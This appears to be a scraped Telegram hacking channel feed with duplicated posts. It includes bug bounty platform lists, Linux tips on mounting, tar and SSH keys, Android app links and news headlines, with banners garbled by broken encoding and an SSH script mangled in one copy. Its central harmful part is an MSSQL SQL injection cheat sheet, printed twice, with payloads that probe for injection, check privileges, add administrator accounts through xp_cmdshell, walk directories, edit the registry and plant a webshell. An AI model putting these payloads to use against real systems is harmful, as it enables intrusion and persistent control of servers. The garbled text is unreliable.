β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking Platforms :
- [YesWeHack](https://yeswehack.com/)
- [intigriti](https://intigriti.com/)
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://bugcrowd.com/)
- [Cobalt](https://cobalt.io/)
- [Bountysource](https://www.bountysource.com/)
- [Bounty Factory](https://bountyfactory.io/)
- [Coder Bounty](http://www.coderbounty.com/)
- [FreedomSponsors](https://freedomsponsors.org/)
- [FOSS Factory](http://www.fossfactory.org/)
- [Synack](https://www.synack.com/)
- [HackenProof](https://hackenproof.com/)
- [Detectify](https://cs.detectify.com/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hacktrophy](https://hacktrophy.com/)
- [AntiHACK](https://www.antihack.me/)
- [CESPPA](https://www.cesppa.com/)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking Platforms :
- [YesWeHack](https://yeswehack.com/)
- [intigriti](https://intigriti.com/)
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://bugcrowd.com/)
- [Cobalt](https://cobalt.io/)
- [Bountysource](https://www.bountysource.com/)
- [Bounty Factory](https://bountyfactory.io/)
- [Coder Bounty](http://www.coderbounty.com/)
- [FreedomSponsors](https://freedomsponsors.org/)
- [FOSS Factory](http://www.fossfactory.org/)
- [Synack](https://www.synack.com/)
- [HackenProof](https://hackenproof.com/)
- [Detectify](https://cs.detectify.com/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hacktrophy](https://hacktrophy.com/)
- [AntiHACK](https://www.antihack.me/)
- [CESPPA](https://www.cesppa.com/)
β β β Uππ»βΊπ«Δπ¬πβ β β β
YesWeHack
Global Bug Bounty & Vulnerability Management Platform | YesWeHack
Explore YesWeHack, leading global Bug Bounty & Vulnerability Management Platform. Connect with tens of thousands of ethical hackers worldwide to uncover vulnerabilities in your websites, mobile apps, and digital infrastructure, bolstering your cyber defenceβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting :
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
4) perform low-level settings at the device level (setting the read
5) only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values of these settings and disk properties
6) mount disk partitions (or the entire disk if not partitioned)
#fASTtIPS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting :
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
4) perform low-level settings at the device level (setting the read
5) only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values of these settings and disk properties
6) mount disk partitions (or the entire disk if not partitioned)
#fASTtIPS
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Clop ransomware organization attacked by E-Land Group, disclosed 100,000 credit card information as announced
#Malwares #CyberAttacks
#Malwares #CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
With "remote" DX, JAL and ANA open up the future, transporting remote islands to space avatars
#Technologies #international
#Technologies #international
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST FILE MANAGER FOR ANDROID:
https://play.google.com/store/apps/details?id=com.amaze.filemanager
https://play.google.com/store/apps/details?id=pl.solidexplorer2
https://play.google.com/store/apps/details?id=com.metago.astro
https://play.google.com/store/apps/details?id=com.cxinventor.file.explorer
https://play.google.com/store/apps/details?id=nextapp.fx
https://play.google.com/store/apps/details?id=com.mixplorer.silver
https://play.google.com/store/apps/details?id=pl.mkexplorer.kormateusz
https://play.google.com/store/apps/details?id=com.speedsoftware.rootexplorer
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST FILE MANAGER FOR ANDROID:
https://play.google.com/store/apps/details?id=com.amaze.filemanager
https://play.google.com/store/apps/details?id=pl.solidexplorer2
https://play.google.com/store/apps/details?id=com.metago.astro
https://play.google.com/store/apps/details?id=com.cxinventor.file.explorer
https://play.google.com/store/apps/details?id=nextapp.fx
https://play.google.com/store/apps/details?id=com.mixplorer.silver
https://play.google.com/store/apps/details?id=pl.mkexplorer.kormateusz
https://play.google.com/store/apps/details?id=com.speedsoftware.rootexplorer
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Amaze File Manager - Apps on Google Play
Open Source Material Design file manager for Android
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Muscovites share a common Instagram account with a million subscribers in court due to divorce.
#Leaks
#Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Configuring SSH login without password for multiple remote servers using a script:
Create a new SSH key on Linux
First, generate an SSH key pair (the private / identity key that the SSH client uses to authenticate when logging into the remote SSH server, and the public key stored as an authorized key on the remote system running the SSH server) using ssh - keygen as follows:
# ssh-keygen
Creating bash script for multiple remote logins
Next, create a script to help copy the public key to multiple remote Linux hosts.
# vim ~ / .bin / ssh-copy.sh
Copy and paste the following code into a file (replace the following variables accordingly USER_NAME is the username to connect to, HOST_FILE is a file containing a list of hostnames or IP addresses, and ERROR_FILE is a file to store any ssh command errors).
#! / bin / bash
USER_NAME = "root"
HOST_FILE = "/ root / hosts"
ERROR_FILE = "/ tmp / ssh-copy_error.txt"
PUBLIC_KEY_FILE = "$ 1"
if [! -f $ PUBLIC_KEY_FILE]; then
echo "File '$ PUBLIC_KEY_FILE' not found!"
exit 1
fi
if [! -f $ HOST_FILE]; then
echo "File '$ HOST_FILE' not found!"
exit 2
fi
for IP in
ssh-copy-id -i $ PUBLIC_KEY_FILE $ USER_NAME @ $ IP 2> $ ERROR_FILE
RESULT = $?
if [$ RESULT -eq 0]; then
echo ""
echo "Public key copied to $ IP successfully"
echo ""
else
echo "$ (cat $ ERROR_FILE)"
echo
exit 3
fi
echo ""
done
Save the file and close it.
Then make the script executable with the chmod command, as follows:
# chmod + x ssh-copy.sh
Now run the ssh-copy.sh script and provide your public key file as the first argument as shown below:
# ./ssh-copy.sh /root/.ssh/prod-rsa.pub
Then use ssh-agent to manage your keys, which stores your decrypted private key in memory and uses it to authenticate logins.
After starting ssh-agent add your private key to it like this:
# eval "$ (ssh-agent -s)"
# ssh-add ~ / .ssh / prod_rsa
Login to remote Linux server without password
You can now log into any of your remote hosts without entering a password to authenticate the SSH user.
This way you can automate cross-server processes.
# ssh root@10.2.32.12
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π Configuring SSH login without password for multiple remote servers using a script:
Create a new SSH key on Linux
First, generate an SSH key pair (the private / identity key that the SSH client uses to authenticate when logging into the remote SSH server, and the public key stored as an authorized key on the remote system running the SSH server) using ssh - keygen as follows:
# ssh-keygen
Creating bash script for multiple remote logins
Next, create a script to help copy the public key to multiple remote Linux hosts.
# vim ~ / .bin / ssh-copy.sh
Copy and paste the following code into a file (replace the following variables accordingly USER_NAME is the username to connect to, HOST_FILE is a file containing a list of hostnames or IP addresses, and ERROR_FILE is a file to store any ssh command errors).
#! / bin / bash
USER_NAME = "root"
HOST_FILE = "/ root / hosts"
ERROR_FILE = "/ tmp / ssh-copy_error.txt"
PUBLIC_KEY_FILE = "$ 1"
if [! -f $ PUBLIC_KEY_FILE]; then
echo "File '$ PUBLIC_KEY_FILE' not found!"
exit 1
fi
if [! -f $ HOST_FILE]; then
echo "File '$ HOST_FILE' not found!"
exit 2
fi
for IP in
cat $ HOST_FILE; dossh-copy-id -i $ PUBLIC_KEY_FILE $ USER_NAME @ $ IP 2> $ ERROR_FILE
RESULT = $?
if [$ RESULT -eq 0]; then
echo ""
echo "Public key copied to $ IP successfully"
echo ""
else
echo "$ (cat $ ERROR_FILE)"
echo
exit 3
fi
echo ""
done
Save the file and close it.
Then make the script executable with the chmod command, as follows:
# chmod + x ssh-copy.sh
Now run the ssh-copy.sh script and provide your public key file as the first argument as shown below:
# ./ssh-copy.sh /root/.ssh/prod-rsa.pub
Then use ssh-agent to manage your keys, which stores your decrypted private key in memory and uses it to authenticate logins.
After starting ssh-agent add your private key to it like this:
# eval "$ (ssh-agent -s)"
# ssh-add ~ / .ssh / prod_rsa
Login to remote Linux server without password
You can now log into any of your remote hosts without entering a password to authenticate the SSH user.
This way you can automate cross-server processes.
# ssh root@10.2.32.12
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Renesas is a new product of Arm microcomputer that enables touchless operation 10 cm away.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
How to Untar Files in Linux ?
First, letβs create a tar archive with several files and directories. Here, Iβve created a directory with the name βAntsβ that will be transformed into a tar archive.
$ tree Ants/
Now, letβs make a tar archive out of the directory. Here, tar will use various compression algorithms to do the job. Itβs a common practice that the compression algorithm dictates the output file name.
To create a tar archive using gzip compression, use the following command.
$ tar -cvzf ants.tar.gz <source_file_directory>
To create a tar archive using bzip2 compression, use the following command.
$ tar -cvjf ants.tar.bz2 <source_file_directory>
$ tar -cvJf ants.tar.xz <source_file_directory>
Extracting tar files
List tar content
The following tar command will list all the files and directories included in the tar archive.
$ tar -tvf <tar_archive>
The following tar command will extract any valid tar archive. If files with similar filenames exist, upon extraction, tar will overwrite the files outside the archive.
$ tar -xvf <tar_archive>
Here, weβre facing one new tar flag.
x: It tells tar to extract an archive.
If you donβt want tar to overwrite existing data, add the β-kβ flag. It tells tar not to overwrite/replace any existing file or directory.
$ tar -xvkf <tar_archive>
There are some situations where you donβt need the entire tar archive extracted only to grab a single file. The tar tool offers such flexibility that you can extract only the select few files you need.
For this task, the tar command structure would look like this. Here, the file name would be the file name of your desired file. It must match with the file name thatβs inside the tar archive.
$ tar -xvf <tar_archive> <filename>
If you want to extract a couple of files in such a manner, use the following command structure.
$ tar -xvf <tar_archive> <filename_1> <filename_2>
Unix forums
β β β Uππ»βΊπ«Δπ¬πβ β β β
How to Untar Files in Linux ?
First, letβs create a tar archive with several files and directories. Here, Iβve created a directory with the name βAntsβ that will be transformed into a tar archive.
$ tree Ants/
Now, letβs make a tar archive out of the directory. Here, tar will use various compression algorithms to do the job. Itβs a common practice that the compression algorithm dictates the output file name.
To create a tar archive using gzip compression, use the following command.
$ tar -cvzf ants.tar.gz <source_file_directory>
To create a tar archive using bzip2 compression, use the following command.
$ tar -cvjf ants.tar.bz2 <source_file_directory>
$ tar -cvJf ants.tar.xz <source_file_directory>
Extracting tar files
List tar content
The following tar command will list all the files and directories included in the tar archive.
$ tar -tvf <tar_archive>
The following tar command will extract any valid tar archive. If files with similar filenames exist, upon extraction, tar will overwrite the files outside the archive.
$ tar -xvf <tar_archive>
Here, weβre facing one new tar flag.
x: It tells tar to extract an archive.
If you donβt want tar to overwrite existing data, add the β-kβ flag. It tells tar not to overwrite/replace any existing file or directory.
$ tar -xvkf <tar_archive>
There are some situations where you donβt need the entire tar archive extracted only to grab a single file. The tar tool offers such flexibility that you can extract only the select few files you need.
For this task, the tar command structure would look like this. Here, the file name would be the file name of your desired file. It must match with the file name thatβs inside the tar archive.
$ tar -xvf <tar_archive> <filename>
If you want to extract a couple of files in such a manner, use the following command structure.
$ tar -xvf <tar_archive> <filename_1> <filename_2>
Unix forums
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
